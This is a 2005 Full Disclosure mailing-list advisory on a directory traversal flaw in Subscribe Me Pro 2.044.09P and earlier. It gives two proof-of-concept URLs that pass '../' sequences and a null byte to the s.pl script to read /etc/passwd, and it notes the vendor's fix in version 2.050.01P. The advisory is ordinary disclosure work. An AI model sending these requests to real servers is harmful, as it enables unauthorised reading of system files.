Full Disclosure mailing list archives
Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability
From: h4cky0u <h4cky0u.org () gmail com>
Date: Tue, 13 Sep 2005 17:32:27 +0530
-------------------------------------------------------------- HYA-2005-006 h4cky0u.org <http://h4cky0u.org> Advisory 007 -------------------------------------------------------------- Date - Tue Sep 13 2005 TITLE: ====== Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability SEVERITY: ========= High SOFTWARE: ========= Subscribe Me Pro 2.044.09P and prior Support Website : http://siteinteractive.com/subpro/ INFO: ===== Subscribe Me Professional is designed to assist with the building, maintaining, mailing, and tracking of your customer/prospect mailing lists. BUG DESCRIPTION: ================ Subscribe Me Pro 2.044.09P and prior are prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An unauthorized user can retrieve arbitrary files by supplying directory traversal strings '../' to the vulnerable parameter. POC: ==== Here are some examples: www.site.com/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../../etc/passwd%00&SUBMIT=%20%20Submit%20%20<http://www.site.com/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../../etc/passwd%00&SUBMIT=%20%20Submit%20%20> www.site.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscribe=subscribe&l=../../../../../../../../etc/passwd%00<http://www.site.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscribe=subscribe&l=../../../../../../../../etc/passwd%00> VENDOR STATUS: ============== Vendor Contact : 13th Sep 2005 Vendor Reply : 13th sep 2005 - This Vulnerability has been fixed in the Latest Release : 2.050.01P FIX: ==== Upgrade to version 2.050.01P CREDITS: ======== This vulnerability was discovered and researched by - ShoCK FX of h4cky0u Security Forums. mail : shockfx at gmail.com <http://gmail.com> web : http://www.h4cky0u.org Co Researcher - h4cky0u of h4cky0u Security Forums. mail : h4cky0u at gmail.com <http://gmail.com> web : http://www.h4cky0u.org ORIGINAL ADVISORY: ================= http://www.h4cky0u.org/advisories/HYA-2005-007-subscribe-me-pro.txt -- http://www.h4cky0u.org (In)Security at its best...
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability h4cky0u (Sep 13)